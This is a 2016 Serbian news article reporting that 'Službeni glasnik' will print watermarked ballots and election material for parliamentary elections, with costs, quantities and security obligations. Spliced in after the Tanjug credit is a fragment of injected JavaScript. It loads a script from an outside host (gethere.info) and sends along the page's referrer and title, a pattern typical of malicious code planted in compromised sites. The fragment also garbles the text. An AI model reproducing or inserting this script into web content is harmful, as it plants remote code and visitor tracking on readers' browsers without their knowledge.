Politika
17.03.2016. 14:52
ekspres

Glasačke listiće štampaće "Službeni glasnik"

Ekspres.net
Izvor: Ekspres.net

"Službeni glasnik" štampaće glasačke listiće i ostali izborni materijal za predstojeće parlamentarne izbore, odlučila je danas Republička izborna komisija (RIK) i navela da će to koštati 49.508.060 dinara bez PDV.

Glasački listići za izbor narodnih poslanika Skupštine Srbije štampaće se na srpskom i jezicima nacionalnih manjina u sivoj bojoj koja je zaštićena vodenim žigom u ukunom tiražu od sedam miliona primeraka.

 "Službeni glasnik" štampaće i kontrolni list za proveru ispravnosti glasačke kutije u prljavo roze boji zaštićen vodenim žigom u oko 9.000 primeraka, odlučeno je na današnjoj sednici RIK.

U ugovoru o štampanju izbornog materijala još se navodi da se Službeni glasnik obavezuje da preduzme sve potrebne mere bezbednosti da glasački listići i ostali izborni materijal ne dođe u posed neovlašćenih lica u toku štampanja razvrstavanja, pakovanja i prevoza do sedišta okruga i grada Beograda, kao i do sedišta Ministarstva spoljnih poslova.

Takođe, obavezuju se da će papir za štampanje glasačkih listića, koji je zaštićen vodenim žigom po celoj površini, biti proizveden samo za potrebe izvršioca.

(Tanjug)s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
11°C
20.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve